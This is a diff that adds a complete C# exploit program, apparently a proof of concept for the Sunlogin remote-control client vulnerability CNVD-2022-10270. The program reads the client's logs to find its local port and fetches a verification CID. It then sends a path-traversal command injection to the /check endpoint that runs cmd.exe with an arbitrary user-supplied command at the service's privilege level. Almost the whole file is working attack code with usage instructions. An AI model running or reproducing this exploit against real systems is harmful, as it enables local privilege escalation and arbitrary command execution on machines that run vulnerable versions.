CNVD-2022-10270-LPE

sunloginLPE/Program.cs

@@ -0,0 +1,149 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+using System.Text.RegularExpressions;
+using System.Net;
+
+namespace sunloginLPE
+{
+
+    internal class Program
+    {
+        static string GetLatestFiles(string Path, int count)
+        {
+            var query = (from f in Directory.GetFiles(Path)
+                         let fi = new FileInfo(f)
+                         orderby fi.CreationTime descending
+                         select fi.FullName).Take(count);
+            string[] files = query.ToArray();
+            for (int i = 0; i < files.Length; i++)
+            {
+                if (files[i].Contains("sunlogin_service."))
+                {
+                    return files[i];
+                }
+            }
+            Console.WriteLine("[-] logFile not found");
+            return "";
+        }
+        static string getPort(string path)
+        {
+            string logFile = GetLatestFiles(path + "\\log", 2);
+            string port = "";
+            string s;
+            if (logFile != "")
+            {
+                FileStream fs = new FileStream(logFile, FileMode.Open, FileAccess.Read, FileShare.ReadWrite);
+                StreamReader sr = new StreamReader(fs, System.Text.Encoding.Default);
+                s  = sr.ReadToEnd();
+                string pattern = @"\bstart listen OK\S*\,";
+                string pattern2 = @"\d{5}";
+                string res = "";
+                MatchCollection mc = Regex.Matches(s, pattern);
+                foreach (Match m in mc)
+                    res = m.Value;
+                MatchCollection mc2 = Regex.Matches(res, pattern2);
+                foreach (Match m2 in mc2)
+                    port = m2.Value;
+            }
+            return port;
+
+        }
+
+        private static String HttpGet(string url, string requestData)
+        {
+            // 实例化请求对象
+            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url + "?" + requestData);
+            request.Method = "GET";
+            request.ContentType = "text/html; charset=UTF-8";
+
+            // 实例化响应对象，获取响应信息
+            HttpWebResponse response = (HttpWebResponse)request.GetResponse();
+            Stream responseStream = response.GetResponseStream();
+            StreamReader sReader = new StreamReader(responseStream, Encoding.Default);
+            String result = sReader.ReadToEnd();
+            sReader.Close();
+            responseStream.Close();
+            return result;
+        }
+
+        private static String HttpGetWithCookie(string url, string requestData,string cookie)
+        {
+            // 实例化请求对象
+            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url + "?" + requestData);
+            request.Method = "GET";
+            request.ContentType = "text/html; charset=UTF-8";
+            request.Headers.Add("Cookie", "CID=" + cookie);
+
+            // 实例化响应对象，获取响应信息
+            HttpWebResponse response = (HttpWebResponse)request.GetResponse();
+            Stream responseStream = response.GetResponseStream();
+            StreamReader sReader = new StreamReader(responseStream, Encoding.Default);
+            String result = sReader.ReadToEnd();
+            sReader.Close();
+            responseStream.Close();
+            return result;
+        }
+        static string exp(string SunloginClient_port,string ExecCmd)
+        {
+            String targetUrl = "http://127.0.0.1:" + SunloginClient_port + "/cgi-bin/rpc";
+            String response = HttpGet(targetUrl, "action=verify-haras");
+            string pattern = "verify_string\":\"(\\w+)?\"";
+            string cid = "";
+            MatchCollection mc = Regex.Matches(response, pattern);
+            foreach (Match m in mc)
+                cid = m.Value;
+            cid = cid.Replace("\"", "").Replace("verify_string:", "");
+            Console.WriteLine("[+] CID=" +cid);
+
+            targetUrl = "http://127.0.0.1:" + SunloginClient_port + "/check";
+            response = HttpGetWithCookie(targetUrl, "cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows\\system32\\cmd.exe+/c+" + ExecCmd.Replace(" ","+"),cid);
+
+            return response;
+        }
+        static void Main(string[] args)
+        {
+            
+            Console.WriteLine("[!] Usage: sunloginLPE.exe Cmd [sunloginClientPath]（DefaultPath = C:\\Program Files\\Oray\\SunLogin\\SunloginClient）");
+            string defaultPath = "C:\\Program Files\\Oray\\SunLogin\\SunloginClient";
+            string cmd = "";
+            string path = defaultPath;
+            string port = "";
+            if(args.Length  == 1)
+            {
+                cmd = args[0];
+            }
+            else if(args.Length == 2)
+            {
+                cmd=args[0];
+                path =args[1];
+            }
+            else
+            {
+                Console.WriteLine("[-] wrong number of parameters");
+                System.Environment.Exit(0);
+            }
+            try
+            {
+                port = getPort(path);
+                if(port != "")
+                {
+                    Console.WriteLine("[+] SunloginClient port is " + port);
+                }
+                else
+                {
+                    Console.WriteLine("[-] SunloginClient port not found");
+                    System.Environment.Exit(0);
+                }
+                Console.WriteLine("[+] 命令执行结果: \n" + exp(port, cmd));
+            }
+            catch(Exception ex)
+            {
+                Console.WriteLine("[-] " + ex.ToString());
+            }
+        }
+    }
+}